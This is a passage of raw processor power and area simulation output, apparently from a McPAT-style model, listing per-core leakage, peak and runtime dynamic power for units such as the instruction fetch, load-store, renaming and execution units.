'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0870795, 'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0112877, 'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698, 'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968, 'Execution Unit/Register Files/Gate Leakage': 0.000622708, 'Execution Unit/Register Files/Integer RF/Area': 0.362673, 'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992, 'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.127173, 'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0834796, 'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175, 'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675, 'Execution Unit/Register Files/Peak Dynamic': 0.214252, 'Execution Unit/Register Files/Runtime Dynamic': 0.0947673, 'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387, 'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643, 'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912, 'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402, 'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.294983, 'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.660797, 'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478, 'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543, 'Execution Unit/Runtime Dynamic': 2.37092, 'Execution Unit/Subthreshold Leakage': 1.79543, 'Execution Unit/Subthreshold Leakage with power gating': 0.688821, 'Gate Leakage': 0.368936, 'Instruction Fetch Unit/Area': 5.85939, 'Instruction Fetch Unit/Branch Predictor/Area': 0.138516, 'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221, 'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362, 'Instruction Fetch Unit/Branch 
Predictor/Chooser/Peak Dynamic': 0.0168831, 'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00104267, 'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719, 'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236, 'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00104267, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000944444, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.00038545, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power 
gating': 0.000957045, 'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838, 'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732, 'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05, 'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602, 'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00119919, 'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505, 'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733, 'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00422898, 'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703, 'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282, 'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954, 'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758, 'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867, 'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00870096, 'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682, 'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357, 'Instruction Fetch Unit/Gate Leakage': 0.0589979, 'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323, 'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05, 'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827, 'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.080251, 'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885, 'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682, 'Instruction Fetch Unit/Instruction Cache/Area': 3.14635, 'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931, 'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 5.10465, 'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 
0.196881, 'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022, 'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386, 'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799, 'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493, 'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404, 'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.272569, 'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943, 'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104, 'Instruction Fetch Unit/Peak Dynamic': 7.57091, 'Instruction Fetch Unit/Runtime Dynamic': 0.56263, 'Instruction Fetch Unit/Subthreshold Leakage': 0.932286, 'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843, 'L2/Area': 4.53318, 'L2/Gate Leakage': 0.015464, 'L2/Peak Dynamic': 0.0108555, 'L2/Runtime Dynamic': 0.00260558, 'L2/Subthreshold Leakage': 0.834142, 'L2/Subthreshold Leakage with power gating': 0.401066, 'Load Store Unit/Area': 8.80901, 'Load Store Unit/Data Cache/Area': 6.84535, 'Load Store Unit/Data Cache/Gate Leakage': 0.0279261, 'Load Store Unit/Data Cache/Peak Dynamic': 3.59672, 'Load Store Unit/Data Cache/Runtime Dynamic': 1.13709, 'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675, 'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085, 'Load Store Unit/Gate Leakage': 0.0350888, 'Load Store Unit/LoadQ/Area': 0.0836782, 'Load Store Unit/LoadQ/Gate Leakage': 0.00059896, 'Load Store Unit/LoadQ/Peak Dynamic': 0.0763388, 'Load Store Unit/LoadQ/Runtime Dynamic': 0.0763389, 'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961, 'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918, 'Load Store Unit/Peak Dynamic': 3.95721, 'Load Store Unit/Runtime Dynamic': 1.58991, 'Load Store Unit/StoreQ/Area': 0.322079, 'Load Store Unit/StoreQ/Gate Leakage': 0.00329971, 'Load Store 
Unit/StoreQ/Peak Dynamic': 0.188239, 'Load Store Unit/StoreQ/Runtime Dynamic': 0.376478, 'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621, 'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004, 'Load Store Unit/Subthreshold Leakage': 0.591321, 'Load Store Unit/Subthreshold Leakage with power gating': 0.283293, 'Memory Management Unit/Area': 0.4339, 'Memory Management Unit/Dtlb/Area': 0.0879726, 'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729, 'Memory Management Unit/Dtlb/Peak Dynamic': 0.0668065, 'Memory Management Unit/Dtlb/Runtime Dynamic': 0.066927, 'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699, 'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485, 'Memory Management Unit/Gate Leakage': 0.00808595, 'Memory Management Unit/Itlb/Area': 0.301552, 'Memory Management Unit/Itlb/Gate Leakage': 0.00393464, 'Memory Management Unit/Itlb/Peak Dynamic': 0.317389, 'Memory Management Unit/Itlb/Runtime Dynamic': 0.0324018, 'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758, 'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842, 'Memory Management Unit/Peak Dynamic': 0.588259, 'Memory Management Unit/Runtime Dynamic': 0.0993287, 'Memory Management Unit/Subthreshold Leakage': 0.0766103, 'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333, 'Peak Dynamic': 20.8867, 'Renaming Unit/Area': 0.303608, 'Renaming Unit/FP Front End RAT/Area': 0.131045, 'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123, 'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468, 'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.229066, 'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571, 'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885, 'Renaming Unit/Free List/Area': 0.0340654, 'Renaming Unit/Free List/Gate Leakage': 2.5481e-05, 'Renaming Unit/Free List/Peak Dynamic': 0.0306032, 'Renaming Unit/Free List/Runtime 
Dynamic': 0.0149292, 'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144, 'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064, 'Renaming Unit/Gate Leakage': 0.00708398, 'Renaming Unit/Int Front End RAT/Area': 0.0941223, 'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242, 'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965, 'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.134451, 'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488, 'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228, 'Renaming Unit/Peak Dynamic': 3.58947, 'Renaming Unit/Runtime Dynamic': 0.378446, 'Renaming Unit/Subthreshold Leakage': 0.0552466, 'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461, 'Runtime Dynamic': 5.00384, 'Subthreshold Leakage': 6.16288, 'Subthreshold Leakage with power gating': 2.55328}, {'Area': 32.0201, 'Execution Unit/Area': 7.68434, 'Execution Unit/Complex ALUs/Area': 0.235435, 'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646, 'Execution Unit/Complex ALUs/Peak Dynamic': 0.108796, 'Execution Unit/Complex ALUs/Runtime Dynamic': 0.288142, 'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111, 'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163, 'Execution Unit/Floating Point Units/Area': 4.6585, 'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156, 'Execution Unit/Floating Point Units/Peak Dynamic': 0.463434, 'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033, 'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829, 'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061, 'Execution Unit/Gate Leakage': 0.120359, 'Execution Unit/Instruction Scheduler/Area': 1.66526, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433, 'Execution Unit/Instruction 
Scheduler/FP Instruction Window/Peak Dynamic': 1.04181, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.269554, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519, 'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913, 'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223, 'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562, 'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763, 'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.43478, 'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755, 'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964, 'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262, 'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388, 'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608, 'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451, 'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.219462, 'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853, 'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446, 'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.923796, 'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892, 'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346, 'Execution Unit/Integer ALUs/Area': 0.47087, 'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291, 'Execution Unit/Integer ALUs/Peak Dynamic': 0.237241, 'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344, 'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222, 'Execution Unit/Integer ALUs/Subthreshold Leakage with power 
gating': 0.150833, 'Execution Unit/Peak Dynamic': 5.1749, 'Execution Unit/Register Files/Area': 0.570804, 'Execution Unit/Register Files/Floating Point RF/Area': 0.208131, 'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788, 'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0875527, 'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0113063, 'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698, 'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968, 'Execution Unit/Register Files/Gate Leakage': 0.000622708, 'Execution Unit/Register Files/Integer RF/Area': 0.362673, 'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992, 'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.127536, 'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0836169, 'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175, 'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675, 'Execution Unit/Register Files/Peak Dynamic': 0.215089, 'Execution Unit/Register Files/Runtime Dynamic': 0.0949232, 'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387, 'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643, 'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912, 'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402, 'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.295888, 'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.662624, 'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478, 'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543, 'Execution Unit/Runtime Dynamic': 2.37486, 'Execution Unit/Subthreshold Leakage': 1.79543, 'Execution Unit/Subthreshold Leakage with power gating': 0.688821, 'Gate Leakage': 0.368936, 'Instruction Fetch Unit/Area': 5.85939, 
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516, 'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221, 'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362, 'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831, 'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00103724, 'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719, 'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236, 'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00103724, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000939627, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447, 'Instruction Fetch Unit/Branch 
Predictor/L2_Local Predictor/Runtime Dynamic': 0.000383539, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045, 'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838, 'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732, 'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05, 'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602, 'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00120116, 'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505, 'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733, 'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00421527, 'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703, 'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282, 'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954, 'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758, 'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867, 'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00865194, 'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682, 'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357, 'Instruction Fetch Unit/Gate Leakage': 0.0589979, 'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323, 'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05, 'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827, 'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0803831, 'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885, 'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682, 
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635, 'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931, 'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 5.11305, 'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.196565, 'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022, 'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386, 'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799, 'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493, 'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404, 'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.273017, 'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943, 'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104, 'Instruction Fetch Unit/Peak Dynamic': 7.57972, 'Instruction Fetch Unit/Runtime Dynamic': 0.562833, 'Instruction Fetch Unit/Subthreshold Leakage': 0.932286, 'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843, 'L2/Area': 4.53318, 'L2/Gate Leakage': 0.015464, 'L2/Peak Dynamic': 0.0107435, 'L2/Runtime Dynamic': 0.00257807, 'L2/Subthreshold Leakage': 0.834142, 'L2/Subthreshold Leakage with power gating': 0.401066, 'Load Store Unit/Area': 8.80901, 'Load Store Unit/Data Cache/Area': 6.84535, 'Load Store Unit/Data Cache/Gate Leakage': 0.0279261, 'Load Store Unit/Data Cache/Peak Dynamic': 3.59493, 'Load Store Unit/Data Cache/Runtime Dynamic': 1.13633, 'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675, 'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085, 'Load Store Unit/Gate Leakage': 0.0350888, 'Load Store Unit/LoadQ/Area': 0.0836782, 'Load Store Unit/LoadQ/Gate Leakage': 0.00059896, 'Load Store Unit/LoadQ/Peak Dynamic': 0.0762807, 'Load Store Unit/LoadQ/Runtime Dynamic': 0.0762806, 'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961, 'Load Store 
Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918, 'Load Store Unit/Peak Dynamic': 3.95514, 'Load Store Unit/Runtime Dynamic': 1.5888, 'Load Store Unit/StoreQ/Area': 0.322079, 'Load Store Unit/StoreQ/Gate Leakage': 0.00329971, 'Load Store Unit/StoreQ/Peak Dynamic': 0.188095, 'Load Store Unit/StoreQ/Runtime Dynamic': 0.37619, 'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621, 'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004, 'Load Store Unit/Subthreshold Leakage': 0.591321, 'Load Store Unit/Subthreshold Leakage with power gating': 0.283293, 'Memory Management Unit/Area': 0.4339, 'Memory Management Unit/Dtlb/Area': 0.0879726, 'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729, 'Memory Management Unit/Dtlb/Peak Dynamic': 0.0667556, 'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0668763, 'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699, 'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485, 'Memory Management Unit/Gate Leakage': 0.00808595, 'Memory Management Unit/Itlb/Area': 0.301552, 'Memory Management Unit/Itlb/Gate Leakage': 0.00393464, 'Memory Management Unit/Itlb/Peak Dynamic': 0.317911, 'Memory Management Unit/Itlb/Runtime Dynamic': 0.0323439, 'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758, 'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842, 'Memory Management Unit/Peak Dynamic': 0.588694, 'Memory Management Unit/Runtime Dynamic': 0.0992201, 'Memory Management Unit/Subthreshold Leakage': 0.0766103, 'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333, 'Peak Dynamic': 20.8987, 'Renaming Unit/Area': 0.303608, 'Renaming Unit/FP Front End RAT/Area': 0.131045, 'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123, 'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468, 'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.230312, 'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571, 'Renaming 
Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885, 'Renaming Unit/Free List/Area': 0.0340654, 'Renaming Unit/Free List/Gate Leakage': 2.5481e-05, 'Renaming Unit/Free List/Peak Dynamic': 0.0306032, 'Renaming Unit/Free List/Runtime Dynamic': 0.0149644, 'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144, 'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064, 'Renaming Unit/Gate Leakage': 0.00708398, 'Renaming Unit/Int Front End RAT/Area': 0.0941223, 'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242, 'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965, 'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.134657, 'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488, 'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228, 'Renaming Unit/Peak Dynamic': 3.58947, 'Renaming Unit/Runtime Dynamic': 0.379933, 'Renaming Unit/Subthreshold Leakage': 0.0552466, 'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461, 'Runtime Dynamic': 5.00823, 'Subthreshold Leakage': 6.16288, 'Subthreshold Leakage with power gating': 2.55328}, {'Area': 32.0201, 'Execution Unit/Area': 7.68434, 'Execution Unit/Complex ALUs/Area': 0.235435, 'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646, 'Execution Unit/Complex ALUs/Peak Dynamic': 0.10861, 'Execution Unit/Complex ALUs/Runtime Dynamic': 0.287996, 'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111, 'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163, 'Execution Unit/Floating Point Units/Area': 4.6585, 'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156, 'Execution Unit/Floating Point Units/Peak Dynamic': 0.461575, 'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033, 'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829, 'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061, 'Execution Unit/Gate Leakage': 0.120359, 
'Execution Unit/Instruction Scheduler/Area': 1.66526, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.270625, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519, 'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913, 'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223, 'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562, 'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763, 'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.436509, 'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755, 'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964, 'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262, 'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388, 'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608, 'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451, 'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.220335, 'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853, 'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446, 'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.927469, 'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892, 'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346, 'Execution Unit/Integer ALUs/Area': 0.47087, 'Execution Unit/Integer ALUs/Gate Leakage': 
